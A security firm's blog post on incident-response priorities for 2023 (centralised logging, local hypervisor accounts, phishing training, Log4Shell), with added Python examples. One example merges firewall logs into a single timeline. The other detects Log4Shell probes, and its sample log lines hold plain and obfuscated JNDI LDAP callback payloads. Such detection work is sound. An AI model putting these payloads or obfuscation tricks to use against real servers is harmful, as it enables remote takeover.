Our Incident Response Team has had another busy year as organisations fell victim to a wide range of cyber attacks and incidents. In this blog we cover the top 3 things our team thinks organisations need to consider as we head into 2023.
While each cyber incident is unique, there are patterns that emerge and common issues that are discovered. A lot of the time organisations inadvertently make the incident response team's job harder.
One example is where an organisation has multiple security tools in place, such as two firewalls from different vendors, with one covering 60% of the network and the other the remaining 40%.
All well and good, you may think, but when it comes to finding out how an attacker got in it is then difficult to build a picture, because the analysts have to sift through the logs of two different firewalls, each with its own log format and its own clock. That is a very time-consuming process and a task that can slow down an incident response greatly.
Which leads nicely into our first consideration.
Extensive Centralised Logging is a must
When the worst does occur, the incident response team needs to be able to access accurate information quickly.
Logs provide a trail of activities, events and changes in an IT system. They help troubleshoot functionality and performance problems as well as security incidents, and system logs are used to determine when changes were made and who made them. Logs are also often required by regulation.
In forensic investigations, for example, extensive centralised logging of security event logs and backups is crucial in order to determine when and how an attacker gained access to an organisation's systems. Centralising the logs also means they are normalised to one time reference and one format, and that an attacker who wipes the logs on a compromised host has not destroyed the only copy.
“Retention of this logging should go back at least 2 years. At almost every incident that we are sent to investigate the organisation has a lack of logging which makes our job more difficult. Having logs that go back a reasonable amount of time can provide us with vital clues as to how and when an attacker made their move as well as showing us what exactly was compromised,” says Integrity360’s Cyber Threat Response Manager Patrick Wragg.
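To show concretely why the two-firewall situation above costs an investigation time, and what a centralised, normalised log gives the responder instead, here is an added example that is not part of the original post. It takes two constructed log feeds (an iptables-style syslog feed from a hypothetical host fw-a that logs in local time without a year, and a CSV export from a hypothetical fw-b that logs ISO-8601 UTC), normalises both into one UTC timeline, and answers the first question an IR team asks: when and where did the suspect source first get through? All host names, addresses (RFC 5737 documentation and RFC 1918 ranges) and the UTC+1 assumption for fw-a are made up for the example.

```python
"""Merge logs from two differently formatted firewalls into one UTC timeline.

Added example (not from the original post). Everything here is constructed:
the host names fw-a / fw-b, the two log formats, the addresses, and the
assumption that fw-a logs in local time (UTC+1) without a year while fw-b
logs ISO-8601 UTC.
"""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from typing import List, Optional

# Constructed sample: fw-a is an iptables-style syslog feed (no year, local time).
FW_A_LINES = [
    "Dec 14 03:12:07 fw-a kernel: DENY IN=eth0 SRC=203.0.113.5 DST=10.0.0.7 PROTO=TCP DPT=445",
    "Dec 14 03:12:08 fw-a kernel: DENY IN=eth0 SRC=203.0.113.5 DST=10.0.0.7 PROTO=TCP DPT=3389",
    "Dec 14 03:12:10 fw-a kernel: ACCEPT IN=eth0 SRC=203.0.113.5 DST=10.0.0.7 PROTO=TCP DPT=443",
]

# Constructed sample: fw-b exports CSV with ISO-8601 UTC timestamps.
# columns: timestamp,host,action,src,dst,proto,dport
FW_B_LINES = [
    "2022-12-14T02:12:09Z,fw-b,allow,203.0.113.5,10.0.1.20,TCP,3389",
    "2022-12-14T02:12:11Z,fw-b,deny,203.0.113.5,10.0.1.21,TCP,22",
]

# Vendors name the same outcome differently; map both feeds to one vocabulary.
ACTION_MAP = {"accept": "allow", "allow": "allow", "deny": "deny", "drop": "deny"}


@dataclass(order=True)
class Event:
    ts: datetime          # always timezone-aware UTC, so events sort correctly
    source: str
    action: str
    src: str
    dst: str
    proto: str
    dport: int


FW_A_RE = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2}) (?P<day>\s?\d{1,2}) (?P<time>\d\d:\d\d:\d\d) (?P<host>\S+) kernel: "
    r"(?P<action>ACCEPT|DENY) IN=\S+ SRC=(?P<src>\S+) DST=(?P<dst>\S+) "
    r"PROTO=(?P<proto>\S+) DPT=(?P<dport>\d+)$"
)


def parse_fw_a(line: str, year: int, local_tz: timezone) -> Optional[Event]:
    """Parse a syslog-style line. The caller supplies the year and the zone the
    firewall was logging in, because the line itself carries neither."""
    m = FW_A_RE.match(line)
    if not m:
        return None
    naive = datetime.strptime(
        f"{year} {m['mon']} {m['day'].strip()} {m['time']}", "%Y %b %d %H:%M:%S"
    )
    ts = naive.replace(tzinfo=local_tz).astimezone(timezone.utc)
    return Event(ts, m["host"], ACTION_MAP[m["action"].lower()],
                 m["src"], m["dst"], m["proto"], int(m["dport"]))


def parse_fw_b(line: str) -> Optional[Event]:
    """Parse the CSV export; timestamps are already UTC."""
    parts = line.strip().split(",")
    if len(parts) != 7:
        return None
    ts = datetime.strptime(parts[0], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return Event(ts, parts[1], ACTION_MAP[parts[2].lower()],
                 parts[3], parts[4], parts[5], int(parts[6]))


def build_timeline(a_lines: List[str], b_lines: List[str], year: int = 2022,
                   a_tz: timezone = timezone(timedelta(hours=1))) -> List[Event]:
    """Normalise both feeds and return one chronologically ordered list."""
    events: List[Event] = []
    for line in a_lines:
        ev = parse_fw_a(line, year, a_tz)
        if ev:
            events.append(ev)
    for line in b_lines:
        ev = parse_fw_b(line)
        if ev:
            events.append(ev)
    return sorted(events)


def first_allowed(timeline: List[Event], src: str) -> Optional[Event]:
    """The IR question: when and through which device did this source first get in?"""
    for ev in timeline:
        if ev.src == src and ev.action == "allow":
            return ev
    return None


if __name__ == "__main__":
    tl = build_timeline(FW_A_LINES, FW_B_LINES)
    for ev in tl:
        print(ev.ts.isoformat(), ev.source, ev.action, f"{ev.src} -> {ev.dst}:{ev.dport}/{ev.proto}")
    hit = first_allowed(tl, "203.0.113.5")
    if hit:
        print("first allowed:", hit.ts.isoformat(), hit.source, hit.dport)
```

Read in isolation, fw-a's log shows the source being denied on 445 and 3389 and later accepted on 443; only the merged timeline shows that one second after the 3389 denial on fw-a the same source was allowed through to 3389 on fw-b. The year and time-zone parameters are exactly the information a syslog feed silently drops, which is why a central collector should stamp every event with a full UTC timestamp on receipt.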
Locally Store Virtual Infrastructure Authentication
We cannot stress enough the importance of using local accounts, stored on the hypervisor itself, for authentication to your organisation's virtual infrastructure management interfaces, and NOT Active Directory or Lightweight Directory Access Protocol (LDAP) accounts.
It is now fairly trivial for an attacker to compromise domain credentials, as they are easier to reach than you might think. Active Directory is an irresistible target because it is the first place attackers look for usernames, password hashes, permissions and more.
Domain-based authentication (Active Directory or LDAP) for virtual infrastructure management consoles such as ESXi and vCenter should therefore be avoided where possible.
Once the attacker gains control of the organisation's Domain Controller, which is often their goal, every hypervisor that trusts the domain is theirs too, so they can deploy ransomware against entire virtual machines and datastores rather than just file servers and employee workstations. If a company has an application server running as a virtual machine this is crippling, because the whole VM, and with it the entire application, becomes unusable, rather than just the files stored on it.
We recommend local authentication only, with the credentials held in a secure password manager solution rather than on administrators' workstations. Use a unique, strong password for each host, and periodically verify that no host has been joined, or quietly re-joined, to the domain.
Increase your Phishing Awareness Training for Employees
Phishing remains the most common method attackers use to gain initial access to an organisation's networks and systems. Human error plays a part in the vast majority of successful cyber attacks, so training employees in what to look out for in phishing and social engineering attempts is vital.
The most effective way to reduce this risk is to run regular simulated phishing exercises so that employees learn what they should keep an eye out for. After all, the only things that can combat human nature are awareness and training. That training should complement, not replace, technical controls such as multi-factor authentication and email filtering, which limit the damage when someone does click.
What’s the Biggest Cybersecurity Risk in 2023?
In December 2021, a critical zero-day vulnerability was disclosed in the Apache Log4j 2 Java-based logging library. Now known as Log4Shell (CVE-2021-44228), it is an unauthenticated remote code execution (RCE) flaw that allows complete system takeover, and it affects Log4j 2.0-beta9 through 2.14.1.
A patch was released the same month (2.15.0, followed quickly by 2.16.0 and 2.17.x for related issues), but that did not prevent many businesses and organisations from falling victim as attackers exploited it to steal data and credentials and to install ransomware, crypto miners and other malware.
Organisations that fail to carry out regular vulnerability assessments and/or have no patch management policy in place are still exposed to this threat, not least where Log4j is bundled inside third-party applications and appliances that a simple version check will not find.
As we head into 2023 it is inevitable that another Log4Shell-type vulnerability will be discovered. That is what we believe to be the biggest threat as we head into the New Year.
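For a concrete illustration of the detection side of the Log4Shell discussion, here is an added example that is not part of the original post. It scans constructed Apache-style access log lines for JNDI lookup strings, including the obfuscated forms attackers used in December 2021 to get past naive "${jndi:" matches: URL-encoding, nested ${lower:} / ${upper:} lookups, and the ${::-x} default-value trick. The addresses (203.0.113.9, 198.51.100.4) are RFC 5737 documentation ranges and the log lines are made up; the resolver handles only the handful of lookups seen in real probes and makes no attempt to emulate Log4j's full lookup engine.

```python
"""Find Log4Shell (CVE-2021-44228) probes in web-server access logs, including
the obfuscated forms attackers used to slip past naive "${jndi:" string matches.

Added example (not from the original post). The log lines below are
constructed; 203.0.113.9 and 198.51.100.4 are RFC 5737 documentation addresses.
"""
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Constructed Apache-style access log; lines 0, 1 and 3 carry JNDI lookups
# (plain; URL-encoded with ${lower:} nesting; ${::-x} default-value tricks).
SAMPLE_LOG = [
    '203.0.113.9 - - [11/Dec/2021:04:31:22 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.9:1389/a}"',
    '203.0.113.9 - - [11/Dec/2021:04:31:23 +0000] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F203.0.113.9%3A1389%2Fb%7D HTTP/1.1" 200 512 "-" "curl/7.79.1"',
    '198.51.100.4 - - [11/Dec/2021:04:31:25 +0000] "GET /docs/jndi-tutorial HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [11/Dec/2021:04:31:26 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.9:1389/c}"',
]

# Innermost ${...} with no further nesting inside it.
INNER = re.compile(r"\$\{([^${}]*)\}")
# A resolved JNDI lookup: protocol scheme and host:port of the attacker's server.
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^\s}/]+)", re.I)


def _resolve(body: str, original: str) -> str:
    """Evaluate the few Log4j lookups attackers used for obfuscation.
    Anything not understood (including jndi itself) is left untouched."""
    low = body.lower()
    if low.startswith("jndi:"):
        return original
    if ":-" in body:                      # ${env:NaN:-j}, ${::-j}: the default value wins
        return body.split(":-", 1)[1]
    if low.startswith("lower:"):
        return body[6:].lower()
    if low.startswith("upper:"):
        return body[6:].upper()
    return original


def normalise(text: str, max_rounds: int = 20) -> str:
    """Collapse nested lookups inside-out until nothing changes."""
    for _ in range(max_rounds):
        new = INNER.sub(lambda m: _resolve(m.group(1), m.group(0)), text)
        if new == text:
            break
        text = new
    return text


def find_jndi(line: str) -> Optional[Tuple[str, str]]:
    """Return (scheme, target) if the line contains a JNDI lookup, else None."""
    m = JNDI.search(normalise(unquote(line)))
    return (m.group(1).lower(), m.group(2)) if m else None


def scan(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Scan a log; return (line index, scheme, callback target) for each hit."""
    hits = []
    for i, line in enumerate(lines):
        found = find_jndi(line)
        if found:
            hits.append((i, found[0], found[1]))
    return hits


if __name__ == "__main__":
    for idx, scheme, target in scan(SAMPLE_LOG):
        print(f"line {idx}: JNDI lookup via {scheme} to {target}")
```

The callback target each hit reports is what a responder wants next: it is the host to look for in outbound DNS and LDAP/RMI connection logs from the web tier, which is how a probe that actually fired is separated from the background noise of mass scanning. Note that a hit in an access log only proves the string arrived, not that a vulnerable Log4j evaluated it; the vulnerability assessment and patch status of the receiving application settle that.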
A Proactive Incident Response management service gives you access to our experienced Incident Response Team (IRT) who can quickly recognise and contain the threat, reducing your response time and minimising the impact. Get in touch to learn more.